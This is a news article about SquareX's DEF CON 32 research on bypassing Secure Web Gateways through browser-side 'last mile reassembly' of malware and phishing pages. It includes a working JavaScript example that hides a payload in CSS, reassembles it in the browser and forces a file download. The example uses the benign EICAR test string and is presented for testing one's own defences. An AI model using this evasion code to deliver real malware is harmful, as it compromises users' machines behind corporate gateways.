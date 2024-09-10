Photo courtesy of SquareX

SquareX’s founder, Vivek Ramachandran, and the SquareX team presented research on the main stage of DEF CON 32, one of the world’s largest hacker conferences, that unsettled the cybersecurity industry. The team found fundamental flaws in Secure Web Gateways (SWGs), a control that enterprises worldwide rely on to safeguard their employees’ web browsing.

Ramachandran detailed how attackers can exploit these flaws with a class of evasion techniques he calls “last mile reassembly attacks,” bypassing SWG protections to deliver malware undetected.

Most large businesses worldwide rely on SWGs as their only line of browser defense, which makes SquareX’s findings particularly alarming. These systems are designed to monitor and block malicious internet traffic, but they falter when the malware is assembled inside the web browser itself, after the traffic has already passed the network-layer inspection point.

Ramachandran pointed out, “The trigger for an SWG to work is a malicious file download. We demonstrated how attackers can completely sidestep this detection mechanism by directly assembling the malware on the browser. In some of these techniques, the SWG doesn’t even have a clue that a file download happened.”

Simple techniques that completely bypass secure web gateways

Secure Web Gateways sit between the internet and the employee’s device, filtering and monitoring incoming and outgoing network traffic. They enforce company security policy: blocking access to malicious websites, preventing malware downloads, controlling data exfiltration, and so on.

Despite their critical role in enterprise security, SquareX’s research showed that many SWGs are ill-equipped for modern SaaS and web applications, and in particular for the client-side manipulation that browsers now make possible: a gateway inspects what crosses the network, not what a script does with it after it arrives.

Ramachandran’s team demonstrated more than 30 different methods for bypassing these security systems.

For example, SWGs do not monitor many data channels beyond ordinary HTTP request and response bodies, such as gRPC, WebSocket and WebRTC. This leaves the door wide open for attackers to smuggle malicious content through those channels and deliver even well-known malware to the endpoint without triggering any alarm from the SWG.

In another scenario, the attacker embeds the malware inside a web page’s image or CSS file. The SWG sees only harmless-looking data fragments and lets them through. Once in the browser, a client-side script extracts the malware from the image or stylesheet and drops it onto the user’s system as an ordinary file download, one that never crossed the network as a file. SquareX calls this category of bypass ‘Hiding in Plain Sight.’
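The ‘Hiding in Plain Sight’ flow sketched in code, as an added example that is not SquareX’s code or material from the talk. A benign payload (the EICAR anti-malware test string) is split into chunks and hidden in CSS custom properties; a browser-side script parses the stylesheet, reassembles the bytes, verifies a checksum and hands them to a normal Blob download. The CSS carrier, the 16-character chunk size, the FNV-1a checksum and the function names are this example’s own assumptions. The client-side half is the same for the channel bypasses above (WebSocket, gRPC, WebRTC); only how the fragments arrive changes.

```javascript
// Added example, not SquareX's code: "Hiding in Plain Sight" reassembly with the
// benign EICAR test string standing in for malware, so you can safely check whether
// your own gateway or endpoint notices. Carrier format, chunk size and checksum are
// this example's assumptions, not details from the DEF CON talk.

// EICAR anti-malware test string (the backslash is part of the string).
const EICAR = 'X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*';

// FNV-1a 32-bit: a cheap integrity check so the client can tell whether a proxy
// altered any chunk in transit. It is not a security control.
function fnv1a32(bytes) {
  let h = 0x811c9dc5;
  for (const b of bytes) {
    h ^= b;
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h;
}

const bytesToBase64 = (bytes) => btoa(Array.from(bytes, (b) => String.fromCharCode(b)).join(''));
const base64ToBytes = (b64) => Uint8Array.from(atob(b64), (c) => c.charCodeAt(0));

// Attacker side (what the web server publishes): the payload is base64-encoded,
// split into short chunks and stored as CSS custom properties. On the wire the
// gateway sees a stylesheet, not a file download.
function hideInCss(payloadBytes, chunkSize = 16) {
  const b64 = bytesToBase64(payloadBytes);
  const chunks = [];
  for (let i = 0; i < b64.length; i += chunkSize) chunks.push(b64.slice(i, i + chunkSize));
  const lines = chunks.map((c, n) => `  --chunk-${n}: "${c}";`);
  lines.push(`  --chunk-count: ${chunks.length};`);
  lines.push(`  --chunk-fnv: ${fnv1a32(payloadBytes)};`);
  return `:root {\n${lines.join('\n')}\n}\n`;
}

// Browser side ("last mile"): a script fetches the stylesheet as text, pulls the
// chunks back out in order, verifies the checksum and returns the original bytes.
function extractFromCss(cssText) {
  const prop = (name) => {
    const m = cssText.match(new RegExp(`--${name}:\\s*"?([^";]*)"?;`));
    if (!m) throw new Error(`missing --${name}`);
    return m[1];
  };
  const count = Number(prop('chunk-count'));
  let b64 = '';
  for (let n = 0; n < count; n++) b64 += prop(`chunk-${n}`);
  const bytes = base64ToBytes(b64);
  if (fnv1a32(bytes) !== Number(prop('chunk-fnv'))) throw new Error('chunk checksum mismatch');
  return bytes;
}

// The last step only works in a browser: the reassembled bytes become a Blob and an
// anchor click turns them into an ordinary "save file" download that never crossed
// the network as a file. Returns false when there is no DOM (e.g. under Node).
function dropAsDownload(bytes, filename) {
  if (typeof document === 'undefined') return false;
  const url = URL.createObjectURL(new Blob([bytes], { type: 'application/octet-stream' }));
  const a = document.createElement('a');
  a.href = url;
  a.download = filename;
  document.body.appendChild(a);
  a.click();
  a.remove();
  URL.revokeObjectURL(url);
  return true;
}

// End-to-end round trip; returns the stylesheet and the decoded text for inspection.
function roundTrip() {
  const css = hideInCss(new TextEncoder().encode(EICAR));
  const bytes = extractFromCss(css);
  dropAsDownload(bytes, 'eicar.com');
  return { css, text: new TextDecoder().decode(bytes) };
}
```

To reproduce the class of bypass against your own stack, serve the output of hideInCss as a .css file behind the gateway, fetch it from a page in a managed browser and call extractFromCss and dropAsDownload. If the endpoint anti-malware flags eicar.com on disk while the SWG logs show nothing but a stylesheet, the gateway never saw the file. Keep the payload to the EICAR string for such tests.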

Phishing pages can also be drawn entirely on the client side with a canvas engine, rendering the page into an HTML canvas element rather than sending it as HTML. Ramachandran’s analogy: “Rather than shipping a famous painting that the guards well know, invite the artist so he can recreate the entire painting for you.” Because the components of the phishing page never pass through the network, the SWG has nothing to analyze and cannot deem the page malicious.

Enterprises and vendors can test the state of their web defense at browser.security, a website with all these SWG bypasses embedded.

According to Ramachandran, the only way an SWG can protect against Last Mile Reassembly Attacks is “if the browser state is being sent back to the cloud in a synchronized manner.” However, he notes that “scaling such a solution for millions of requests is just not feasible from a time and cost perspective.”

Impact and industry response

The disclosure of these vulnerabilities raises substantial concerns about the effectiveness of current defenses. Many organizations treat SWGs as a cornerstone of their security strategy, expecting them to intercept harmful data before it reaches end users. Ramachandran’s findings suggest that this reliance may be misplaced.

The reaction from SWG vendors and the broader cybersecurity community has been mixed. Some vendors have acknowledged the issue but admitted there are no immediate solutions, while others have remained silent. This has left many cybersecurity professionals reconsidering the role and capability of SWGs in their security frameworks.

Ramachandran did not mince words about the severity of the issue: “This isn’t just a minor glitch that can be patched with an update. It’s a deep architectural failure that could require a fundamental overhaul of how SWGs are designed and deployed.”

SquareX’s conclusion is that a browser-native control, one that sees the file at the point where it is assembled, covers all of the above attacks, at the cost of having to be deployed in every browser the organization wants protected. An SWG could only counter them by streaming browser state to the cloud in real time, which would hurt the user experience, require substantial re-engineering by many vendors, and be very costly.

The call for change in cybersecurity solutions has never been louder as the industry digests these findings. Enterprises now face the challenge of adapting their defenses in light of these exploitable vulnerabilities, a task that will likely define cybersecurity strategy in the coming years.